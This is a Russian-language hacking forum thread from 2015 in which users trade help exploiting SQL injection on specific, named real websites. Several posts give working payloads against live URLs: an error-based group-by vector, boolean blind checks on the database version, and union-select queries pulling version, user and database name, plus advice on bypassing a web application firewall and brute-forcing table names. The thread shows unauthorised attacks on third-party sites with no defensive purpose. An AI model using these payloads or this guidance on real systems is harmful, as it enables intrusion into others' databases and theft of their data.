Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    а что с 22 портом?
     
  2. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    138
    Likes Received:
    30
    Reputations:
    1
    закрыт
     
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,694
    Likes Received:
    397
    Reputations:
    230
    http://www.aua.gr/probata/index.php?id=11))+/*+
    хелп
     
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Сходу вывод не получил.
    Вслепую вектор будет следующим:
    4 версия mysql, смотрите на временную задержку
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,694
    Likes Received:
    397
    Reputations:
    230
    Слепую то я раскрутил, нужен вывод...

    //блин, дак так и ставьте вопрос YaBtr
     
    #23885 DezMond™, 20 Feb 2015
    Last edited by a moderator: 20 Feb 2015
    1 person likes this.
  6. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,694
    Likes Received:
    397
    Reputations:
    230
    я думал, может кто колонки подберёт, тут 2 подзапроса
     
  7. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    607
    Reputations:
    1,101
    Совместно с faza02 и YaBtr:

    Есть таблица images (одно из полей - image_id, второе - image). Доступна mysql.

    Error-based:
    Code:
    [I]id=1%20or%201%29%[/I][I]29%20gro[/I][I]up%20by[/I][I]%20c[/I][I]oncat%28vers[/I][I]ion%28%29,fl[/I][I]oor%28ra[/I][I]nd%280[/I][I]%29*2х[/I][I]%29%29%20[/I][I]having%20min%2[/I][I]80%29%2[/I][I]0or%201/*+[/I]
    
    Подзапросы не работают. Составить запрос для прямого вывода из таблицы пока не удалось.
     
    #23887 randman, 20 Feb 2015
    Last edited: 20 Feb 2015
    1 person likes this.
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,694
    Likes Received:
    397
    Reputations:
    230
    Как правильно обратиться к таблице mysql ?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,671
    Likes Received:
    895
    Reputations:
    363
    error-based вектора для вывода для версии mysql 4.0 не существует на данный момент. в данной ситуации только time-based. однако у этого пользователя file_priv n
     
    _________________________
  10. Simpliest

    Simpliest New Member

    Joined:
    29 Apr 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    не пойму что за sql-inj такая тут

    http://il2.aviasibir.ru/mow/?page=squads&squad_id=4+and+1=1
    http://il2.aviasibir.ru/mow/?page=squads&squad_id=4

    вроде есть, а вроде и нет...
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,671
    Likes Received:
    895
    Reputations:
    363
    мда, совсем не соображаю
     
    _________________________
    #23891 yarbabin, 21 Feb 2015
    Last edited: 21 Feb 2015
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,772
    Likes Received:
    843
    Reputations:
    857
    Как вам такой вариант, коллега ?

    _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=5 TRUE

    _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=4 FALSE
     
    _________________________
    #23892 BigBear, 21 Feb 2015
    Last edited: 21 Feb 2015
    2 people like this.
  13. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Не могу добраться к БД:
    Code:
    http://ukrcrewing.com.ua/-agency%27%20union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21  --%20+
     
  14. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    68
    Likes Received:
    6
    Reputations:
    10
    есть ли здесь уязвимость?
     
  15. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Code:
    ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')
     
  16. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц
     
  17. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    465
    Likes Received:
    261
    Reputations:
    40
    Это Opencart, нет ничего.
     
    2 people like this.
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,671
    Likes Received:
    895
    Reputations:
    363
    waf на точку, у меня обойти не вышло. пробуйте подбирать таблицы перебором
     
    _________________________
  19. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    138
    Likes Received:
    14
    Reputations:
    6
    Парни,я понял что blind sql injection - это сначала запрос вида
    select count(*) from pages where id=...
    а потом
    select * from pages where id=...
    В случае если первый запрос возвращает 0 -происходит редирект.
    Вопрос. Как часто происходит редирект в blind sql injection
     
  20. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    Ерунду какую-то написал. Твои запросы - это обычная union инъекция. Блайнд - это отсутствие вывода, через select ты ничего не выведешь, ты можешь только проверить истинность или ложность выражения. Учи матчасть.
     
Loading...
Thread Status:
Not open for further replies.